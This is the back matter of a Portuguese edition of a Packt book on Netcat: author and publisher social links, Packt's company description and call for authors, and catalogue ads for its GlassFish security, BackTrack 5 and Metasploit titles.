Ê Siga Ed Skoudis no Twitter:

https://twitter.com/#!/edskoudis

Ê Para obter mais informações de código aberto, siga Packt em:

http://twitter.com/#!/packtopensource

48
 Obrigado por comprar
Iniciador Instantâneo do Netcat

Sobre a Publicação Packt

Packt, pronuncia-se 'packed', publicou seu primeiro livro"Dominando o phpMyAdmin para um gerenciamento
eficaz do MySQL" em abril de 2004 e, posteriormente, continuou a se especializar na publicação de livros altamente
focados em tecnologias e soluções específicas.

Nossos livros e publicações compartilham as experiências de seus colegas profissionais de TI na adaptação e

personalização dos sistemas, aplicativos e estruturas atuais. Nossos livros baseados em soluções oferecem a você o
conhecimento e o poder para personalizar o software e as tecnologias que você está usando para realizar o trabalho. Os
livros Packt são mais específicos e menos gerais do que os livros de TI que você viu no passado. Nosso modelo de
negócios exclusivo nos permite trazer a você informações mais focadas, dando a você mais do que você precisa saber e
menos do que você não precisa.

A Packt é uma editora moderna, porém única, que se concentra na produção de livros de
qualidade e de ponta para comunidades de desenvolvedores, administradores e novatos.
Para mais informações, visite nosso site:www.packtpub.com.

Escrevendo para Packt

Congratulamo-nos com todas as perguntas de pessoas interessadas em autoria. As propostas de livros devem ser enviadas para
author@packtpub. com. Se a sua ideia de livro ainda está em estágio inicial e você gostaria de discuti-la antes de escrever uma
proposta formal de livro, entre em contato conosco; um de nossos editores de comissionamento entrará em contato com você.

Não estamos apenas procurando autores publicados; Se você tem fortes habilidades técnicas, mas não tem experiência em
redação, nossos editores experientes podem ajudá-lo a desenvolver uma carreira de escritor ou simplesmente obter alguma
recompensa adicional por sua experiência.
 Segurança GlassFish
ISBN: 978-1-84719-938-6 Brochura: 296 páginas

Proteja sua instalação do GlassFish, aplicativos da Web,

aplicativos EJB, módulos de cliente do aplicativo e serviços da
Web usando medidas de segurança Java EE e GlassFish

1. Proteja sua instalação GlassFish e

aplicativos J2EE

2. Desenvolva aplicativos Java EE seguros, incluindo

módulos Web, EJB e Application Client

3. Proteja os serviços da Web usando os recursos de segurança do

serviço da Web GlassFish e OpenSSO

Guia para iniciantes de teste de

penetração sem fio BackTrack 5
ISBN: 978-1-84951-558-0 Brochura: 220 páginas

Domine técnicas de teste sem fio de ponta com o

BackTrack 5

1. Aprenda o teste de penetração sem fio com a versão

mais recente do Backtrack

2. O primeiro e único livro que aborda testes sem fio com

o BackTrack

3. Conceitos explicados com sessões práticas passo

a passo e ricas ilustrações

por favor, verifiquewww.PacktPub.compara obter informações sobre nossos títulos

 Livro de receitas do BackTrack 5
ISBN: 978-1-84951-738-6 Brochura: 296 páginas

Mais de 80 receitas para executar muitos dos aspectos de teste de

penetração mais conhecidos e pouco conhecidos do BackTrack 5

1. Aprenda a realizar testes de penetração com o Back

Track 5

2. Quase 100 receitas projetadas para ensinar princípios de teste

de penetração e construir conhecimento de
Ferramentas do BackTrack 5

3. Fornece instruções detalhadas passo a passo sobre o uso de

muitas das ferramentas populares e não tão populares do
BackTrack

Livro de receitas de teste de penetração

Metasploit
ISBN: 978-1-84951-742-3 Brochura: 268 páginas

Mais de 70 receitas para dominar a estrutura de

teste de penetração mais usada

1. Mais de 80 receitas/tarefas práticas que vão escalar

o conhecimento do leitor do nível iniciante ao
avançado

2. Foco especial nos mais recentes sistemas operacionais,

explorações e técnicas de teste de penetração

3. Análise detalhada de ferramentas de terceiros com base na

estrutura Metasploit para aprimorar a experiência de
teste de penetração

por favor, verifiquewww.PacktPub.compara obter informações sobre nossos títulos